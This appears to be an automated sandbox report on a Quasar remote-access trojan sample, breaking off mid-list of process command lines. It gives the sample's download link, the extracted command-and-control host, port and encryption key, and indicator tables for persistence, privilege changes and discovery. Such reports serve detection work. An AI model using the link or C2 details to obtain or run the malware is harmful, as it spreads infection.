quasar | hxxps://gofile[.]io/d/5m5iIa

Analysis

max time kernel
135s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2024 16:33

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://gofile.io/d/5m5iIa

Score

10^/10

quasar office04 defense_evasion discovery evasion ransomware spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

himato667-58401.portmap.host:58401

Mutex

0e2bc079-3316-407c-a26f-115195d9fe5b

Attributes

encryption_key
D14CC6B8490A41A48C1E115285B6932B9A857EA0
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000023d0f-239.dat	family_quasar
behavioral1/memory/5268-241-0x00000000006C0000-0x00000000009E4000-memory.dmp	family_quasar

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
2636	cmd.exe
5160	cmd.exe
3520	cmd.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Lose2himato.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Lose2himato.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Lose2himato.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Client.exe

Executes dropped EXE 21 IoCs

pid	Process
5536	Lose2himato.exe
5760	Lose2himato.exe
5268	better.exe
4316	Client.exe
2236	Client.exe
1736	Client.exe
5564	Lose2himato.exe
2816	Client.exe
1680	better.exe
4548	Client.exe
1900	Client.exe
5628	Client.exe
5460	Client.exe
5692	better.exe
3860	Client.exe
4056	Client.exe
5256	Client.exe
5716	Client.exe
5576	Client.exe
4336	Client.exe
4140	Client.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
79	discord.com
80	discord.com

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\system32\SubDir\Client.exe	better.exe
File opened for modification	C:\Windows\system32\SubDir\Client.exe	better.exe
File created	C:\Windows\system32\SubDir\Client.exe	better.exe
File opened for modification	C:\Windows\system32\SubDir\Client.exe	better.exe
File created	C:\Windows\system32\SubDir\Client.exe	better.exe
File opened for modification	C:\Windows\system32\SubDir\Client.exe	better.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himato.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himato.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himato.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himato.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himato.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 14 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6068	PING.EXE
408	PING.EXE
1704	PING.EXE
4004	PING.EXE
5700	PING.EXE
408	PING.EXE
1004	PING.EXE
5184	PING.EXE
5160	PING.EXE
2884	PING.EXE
2668	PING.EXE
5412	PING.EXE
3804	PING.EXE
1932	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "206"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2878641211-696417878-3864914810-1000\{53119C63-F863-4F27-BE1A-5A06F21F4B04}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 294438.crdownload:SmartScreen	msedge.exe

Runs net.exe

Runs ping.exe 1 TTPs 14 IoCs

Remote System Discovery

T1018

pid	Process
408	PING.EXE
4004	PING.EXE
2884	PING.EXE
2668	PING.EXE
1704	PING.EXE
5184	PING.EXE
408	PING.EXE
5412	PING.EXE
5700	PING.EXE
3804	PING.EXE
1932	PING.EXE
5160	PING.EXE
1004	PING.EXE
6068	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4348	schtasks.exe
1752	schtasks.exe
5656	schtasks.exe
5960	schtasks.exe
4980	schtasks.exe
4692	schtasks.exe
1924	schtasks.exe
5228	schtasks.exe
3884	schtasks.exe
6068	schtasks.exe
5856	schtasks.exe
6120	schtasks.exe
6120	schtasks.exe
3868	schtasks.exe
3868	schtasks.exe
5356	schtasks.exe
3692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
432	msedge.exe
432	msedge.exe
4064	msedge.exe
4064	msedge.exe
3224	identity_helper.exe
3224	identity_helper.exe
5336	msedge.exe
5336	msedge.exe
6108	msedge.exe
6108	msedge.exe
6016	msedge.exe
6016	msedge.exe
6016	msedge.exe
6016	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 27 IoCs

pid	Process
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	5268	better.exe
Token: SeDebugPrivilege	4316	Client.exe
Token: SeDebugPrivilege	2236	Client.exe
Token: 33	3252	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3252	AUDIODG.EXE
Token: SeDebugPrivilege	1736	Client.exe
Token: SeDebugPrivilege	2816	Client.exe
Token: SeDebugPrivilege	1680	better.exe
Token: SeDebugPrivilege	4548	Client.exe
Token: SeDebugPrivilege	1900	Client.exe
Token: SeDebugPrivilege	5628	Client.exe
Token: SeDebugPrivilege	5460	Client.exe
Token: SeDebugPrivilege	5692	better.exe
Token: SeDebugPrivilege	3860	Client.exe
Token: SeDebugPrivilege	4056	Client.exe
Token: SeShutdownPrivilege	3344	shutdown.exe
Token: SeRemoteShutdownPrivilege	3344	shutdown.exe
Token: SeDebugPrivilege	5256	Client.exe
Token: SeDebugPrivilege	5716	Client.exe
Token: SeDebugPrivilege	5576	Client.exe
Token: SeDebugPrivilege	4336	Client.exe
Token: SeDebugPrivilege	4140	Client.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4316	Client.exe
2236	Client.exe

Suspicious use of SendNotifyMessage 54 IoCs

pid	Process
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4316	Client.exe
2236	Client.exe
1736	Client.exe
2816	Client.exe
4548	Client.exe
1900	Client.exe
5628	Client.exe
5460	Client.exe
3860	Client.exe
5256	Client.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
5716	Client.exe
5576	Client.exe
4336	Client.exe
4140	Client.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2876	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4064 wrote to memory of 2148	4064	msedge.exe	83
PID 4064 wrote to memory of 2148	4064	msedge.exe	83
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 2436	4064	msedge.exe	84
PID 4064 wrote to memory of 432	4064	msedge.exe	85
PID 4064 wrote to memory of 432	4064	msedge.exe	85
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86
PID 4064 wrote to memory of 392	4064	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/5m5iIa
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
  2⤵
  PID:2148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:2436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:1928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
